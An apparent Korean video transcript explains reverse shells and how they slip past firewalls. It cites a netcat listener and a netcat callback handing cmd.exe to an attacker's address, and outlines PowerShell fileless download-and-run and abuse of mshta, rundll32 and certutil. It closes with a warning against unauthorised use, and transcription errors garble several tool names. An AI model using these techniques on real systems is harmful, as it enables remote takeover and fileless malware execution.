여러분, 방화벽을 설치하면 내 컴퓨터는 안전할 거라고 생각하시죠? 하지만 만약 해커들이 그 튼튼한 방화벽을 그냥 걸어서 통과할 수 있다면 어떨까요? 마치 유령처럼 말이죠. 오늘은 시스템의 정문은 굳게 닫아놓고 어떻게 뒷문을 활짝 열어주는지 그 충격적인 방법, 리버스 쉘의 모든 것을 파헤쳐 보겠습니다. 자, 그럼 바로 본론으로 들어가 볼까요? 우리 모두 방화벽 믿고 있잖아요. 외부 침입을 막아주는 든든한 경비원이라고 생각하죠. 그런데 도대체 왜 방화벽이 멀쩡히 작동하고 있는데도 시스템은 계속 뚫리는 걸까요? 이 질문에 대한 답이 오늘 우리가 알아볼 모든 것의 시작입니다. 자, 이 그림 한 장이 모든 걸 설명해 줍니다. 보세요. 방화벽은요, 밖에서 안으로 들어오려는 공격은 기가 막히게 잘 막아냅니다. 그게 방화벽의 주된 임무니까요. 하지만 반대로 안에서 밖으로 나가는 건 어떨까요? 우리가 인터넷 쇼핑을 하거나 유튜브를 보는 것처럼요. 대부분 그냥 통과시켜주죠. 해커들이 바로 이 허점을 노리는 겁니다. 밖에서 못 들어가면 안에서 나오게 만들면 되잖아. 바로 이 발상의 전환이 모든 걸 바꿔버렸습니다. 네, 바로 그 기막힌 해답이 리버스 쉘입니다. 이름 그대로 연결을 거꾸로 리버스 만들어버리는 거죠. 보통은 해커가 우리 컴퓨터에 접속하려고 시도하잖아요. 근데 리버스 쉘은 그게 아니라 악성 코드에 감염된 우리 컴퓨터가 해커한테 먼저 전화를 거는 방식입니다. 방화벽 입장에서는 내부 사용자가 그냥 평범하게 외부 사이트에 접속하는 것처럼 보이니까 아무런 의심 없이 문을 열어주는 거죠. 정말 교묘하지 않나요? 자, 두 가지 방식을 비교해보면 차이가 확 느껴지실 겁니다. 왼쪽에 있는 전통적인 방식, 바인드 쉘은요, 공격자가 문을 부수고 직접 쳐들어오는 것과 같아요. 당연히 방화벽 경보가 울리고 바로 차단되겠죠. 하지만 오른쪽의 리버스 쉘 완전히 다릅니다. 내부 시스템이 먼저 저기요 하면서 공격자에게 말을 거는 거예요. 방화벽은 이게 정상적인 통신인지 공격인지 구분할 방법이 거의 없습니다. 이게 바로 리버스 쉘이 그토록 강력하고 무서운 이유입니다. 그럼 이제부터 해커들이 실제로 이 리버스 쉘을 어떻게 만들어내는지 그 구체적인 방법들을 하나씩 뜯어보겠습니다. 가장 기본적이면서도 아주 고전적인 도구, 바로 넷캣부터 시작하죠. 자, 공격자가 가장 먼저 하는 일은 자기 컴퓨터에서 연결을 받을 준비를 하는 겁니다. 일종의 대기조를 만들어 놓는 거죠. 화면에 보이는 명령어가 바로 그겁니다. nc-lvp 4242. 여기서 L은 listen, 즉 연결을 기다리겠다는 뜻이고요. V는 자세한 과정을 보여달라는 옵션, P는 포트를 지정하는 겁니다. 포트 번호 4242는 일부러 잘 안 쓰는 번호를 쓰는 거예요. 이제 공격자는 이 4242번 포트로 전화가 오기만을 기다리고 있는 상태입니다. 그리고 시생자 컴퓨터에서 이 한 줄의 명령어가 실행되는 순간 게임은 끝납니다. nc.ex-e-cmd.ex 하고 공격자의 IP 주소와 아까 열어둔 포트 번호를 적어주죠. 이게 무슨 뜻이냐면요. 지금 당장 공격자 컴퓨터로 접속해서 내 컴퓨터의 명령 프롬프트 cmd.ex의 제어권을 전부 다 넘겨줘 라는 의미입니다. 정말 간단하죠. 이 명령어 하나로 내 컴퓨터의 주도권이 완전히 넘어가 버리는 겁니다. 그런데 해커 입장에서도 문제가 좀 있어요. nc.ex 같은 누가 봐도 의심스러운 파일을 희생자 컴퓨터에 몰래 설치하는 게 쉽지 않거든요. 최신 백신들은 이런 걸 바로 잡아내니까요. 그래서 해커들은 더 머리를 씁니다. 굳이 프로그램을 가져갈 필요 없이 원래 그 컴퓨터에 깔려있는 걸 쓰면 되잖아. 이때부터 바로 스크립트 언어의 힘을 빌리기 시작합니다. 이야, 이 코드 좀 보세요. 보기만 해도 머리가 아프죠? 괜찮습니다. 이걸 다 외울 필요는 없어요. 중요한 건 이 한 줄짜리 코드가 아까 봤던 넷캣과 똑같은 일을 한다는 겁니다. 파이썬에 기본적으로 들어있는 소켓이라는 기능으로 통신선을 만들고 서브 프로세스라는 기능으로 내 컴퓨터의 제어권을 그 통신선에 연결해버리는 거죠. 별도의 파일을 설치할 필요 없이 파이썬 코드 한 줄로 끝내는 겁니다. 훨씬 더 들키기 어렵겠죠? 이게 파이썬만 가능한 게 아닙니다. 이건 펄이라는 언어로 만든 건데요. 원리는 완전히 똑같아요. PHP, 루비, 자바스크립트, 사실상 서버에서 돌아가는 거의 모든 프로그래밍 언어로 리버스 쉘을 만들 수 있습니다. 방어하는 사람 입장에서는 정말 미치고 팔짝들 노릇이죠. 어디서 뭐가 튀어나올지 모르니까요. 자, 이제부터가 진짜입니다.
한 단계 더 나아가서 아예 스크립트조차 쓰지 않고 윈도우에 원래부터 설치되어 있는 아주 정상적인 시스템 도구들을 무기로 활용하는 방법입니다. 이건 정말 내부의 적을 이용하는 거나 마찬가지죠. 이런 공격 기법을 전문 용어로 Living of the Land, 줄여서 LOTL이라고 부릅니다. 우리말로는 현지 조달 공격이라고도 해요. 마치 적진에 침투한 스파이가 자기 무기를 쓰는 게 아니라 적군 창고에 있는 총과 칼을 꺼내 쓰는 것과 똑같습니다. 시스템 관리자 눈에는 그냥 정상적인 프로그램이 작동하는 것처럼 보이기 때문에 탐지가 정말 어려워집니다. 그 대표적인 내부의 적이 바로 파워쉘입니다. 윈도우 관리자라면 누구나 쓰는 강력한 도구죠. 이 다운로드 스트링이라는 명령어를 보세요. 이게 뭘 하냐면 인터넷에서 악성 스크립트를 다운로드 하는데 파일로 저장하지 않고 컴퓨터 메모리에서 바로 실행해버립니다. 대부분의 백신은 하드디스크에 저장된 파일을 검사하거든요. 그러니까 이런 파일 없는 공격은 백신의 감시망을 그냥 쓱 통과해버릴 가능성이 아주 높습니다. 이건 한술 더 뜹니다. 아예 파워쉘 자체를 해킹 툴로 만들어버리는 거예요. SCPOLIN-TLET new-object system.netsocket.tcp 클라이언트 이 구문은 파워쉘이 직접 통신 클라이언트를 만들어서 공격자와 연결을 맺어버립니다. 외부에서 무기를 가져오는 게 아니라 파워쉘이라는 관리 도구 자체가 무기가 되는 순간입니다. 다음 타자는 MSHTAEX입니다. 이것도 윈도우의 아주 정상적인 프로그램이에요. 원래는 HTML 기반의 애플리케이션을 실행하는 용도죠. 해커들은 이 프로그램의 본래 기능, 즉 인터넷에서 코드를 가져와서 실행하는 바로 그 기능을 악용합니다. 보시는 것처럼 명령어 한 줄이면 저 멀리 있는 서버의 악성 코드를 내 컴퓨터에서 실행시킬 수 있습니다. 정상적인 도구가 어떻게 악당의 손에 넘어가는지 보여주는 완벽한 예시죠. 런딜 32exe도 마찬가지입니다. 시스템에 꼭 필요한 DLL 파일들을 실행시켜주는 정상적인 프로세스인데요. 이걸 조작해서 자바스크립트 코드를 실행하게 만들 수 있습니다. 컴퓨터 작업 관리자를 열어보면 수십 개의 런딜 32exe가 떠 있는데 그중에 어떤 게 진짜고 어떤 게 공격인지 알아내는 건 거의 불가능에 가깝습니다. 자, 이건 또 아주 영리한 방법인데요. certitude.exe를 이용하는 겁니다. 이 도구는 원래 디지털 인증서를 관리하는 착한 프로그램이에요. 근데 해커들은 이걸 3단계 작전에 써먹습니다. 1단계, certitude를 이용해서 암호화된 악성 파일을 다운받습니다. 2단계, 또 certitude를 이용해서 그 암호를 풉니다. 마지막 3단계, 그렇게 만들어진 진짜 악성 파일에 실행하는 거죠. 신뢰받는 도구 하나로 다운로드, 위장 해제, 실행까지 전부 다 해치우는 겁니다. 네, 지금까지 보셨듯이 리버스 쉘 공격은 정말 다양하고 또 정교하게 진화해 왔습니다. 간단한 도구에서 시작해서 이제는 시스템에 원래 있던 기능까지 교묘하게 악용하는 수준에 이르렀죠. 이 모든 건 결국 지식입니다. 그리고 이 지식은 아주 강력한 힘을 가지고 있습니다. 지식은 힘이다. 그리고 공유를 통해 그 생명력을 유지하라. 이 말은 오늘 우리가 배운 것에 대해 많은 생각을 하게 합니다. 우리는 방금 해커의 강력한 기술, 즉 힘에 대해 배웠습니다. 그리고 이 지식을 공유하는 이유는 이걸로 누군가를 공격하라는 게 아니라 이런 공격이 있다는 걸 알아야 더 튼튼한 방패를 만들 수 있기 때문입니다. 그래서 이 힘에는 반드시 책임이 따라야 합니다. 오늘 우리가 배운 기술들은요, 사실 보안 전문가들이 우리 시스템의 취약점을 미리 찾아서 보강하기 위해 사용하는 도구들입니다. 적이 어떤 칼을 쓰는지 알아야 그걸 막을 방패를 만들 수 있는 것처럼요. 이 지식은 내 시스템, 우리 회사의 시스템을 더 안전하게 만드는 데 사용될 때 비로소 진짜 가치를 갖게 됩니다. 절대로 허가받지 않은 곳에 시험해 보는 건 명백한 범죄라는 사실을 꼭 기억해 주셨으면 합니다. 오늘 내용이 여러분의 보안 시야를 한 뼘 더 넓히는 데 도움이 되었으면 좋겠습니다. 앞으로도 이렇게 복잡하지만 꼭 알아야 할 보안 기술의 속살을 파헤치는 컨텐츠를 계속 만들어갈 수 있도록 구독과 좋아요로 응원해 주시면 정말 큰 힘이 될 겁니다. 시청해 주셔서 정말 감사합니다.